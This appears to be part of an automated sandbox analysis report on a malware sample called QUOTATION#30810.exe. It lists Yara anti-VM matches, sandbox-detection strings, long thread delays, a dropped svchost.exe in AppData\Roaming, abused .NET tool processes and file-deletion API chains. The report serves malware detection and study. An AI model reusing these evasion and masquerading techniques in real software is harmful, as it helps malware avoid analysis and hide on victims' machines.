Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: QUOTATION#30810.exe PID: 4508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6908, type: MEMORYSTR

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040F7A7 Sleep,ExitProcess,		26_2_0040F7A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040F7A7 Sleep,ExitProcess,		45_2_0040F7A7

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Memory allocated: 1FCF8640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Memory allocated: 1FCF9FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 227059C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 2271F5A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1E1DC0E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1E1F5BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17220520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17239FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1D0E85D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1D0EA1A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17F2D2F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17F46DA0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 32_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

32_2_0040DD85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		26_2_0041A748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		45_2_0041A748

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 4784	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 5017	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: foregroundWindowGot 1763	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API coverage: 6.5 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	API coverage: 9.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	API coverage: 6.4 %

Source: C:\Users\user\Desktop\QUOTATION#30810.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4424	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792	Thread sleep count: 4784 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792	Thread sleep time: -14352000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792	Thread sleep count: 5017 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5792	Thread sleep time: -15051000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4780	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3952	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	20_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10006580 FindFirstFileExA,	20_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	26_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	26_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	26_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	26_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0044E879 FindFirstFileExA,	26_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	26_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040783C FindFirstFileW,FindNextFileW,	26_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	26_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	26_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	26_2_0040BD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 32_2_0040AE51 FindFirstFileW,FindNextFileW,	32_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	37_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	39_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	45_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	45_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	45_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	45_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0044E879 FindFirstFileExA,	45_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	45_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040783C FindFirstFileW,FindNextFileW,	45_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	45_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	45_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	45_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

26_2_00407C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 32_2_00418981 memset,GetSystemInfo,

32_2_00418981

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.25.dr	Binary or memory string: VMware
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.25.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.25.dr	Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.25.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.25.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: vbc.exe, 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000014.00000002.4011620526.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658106153.0000013DBA8C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.25.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.25.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
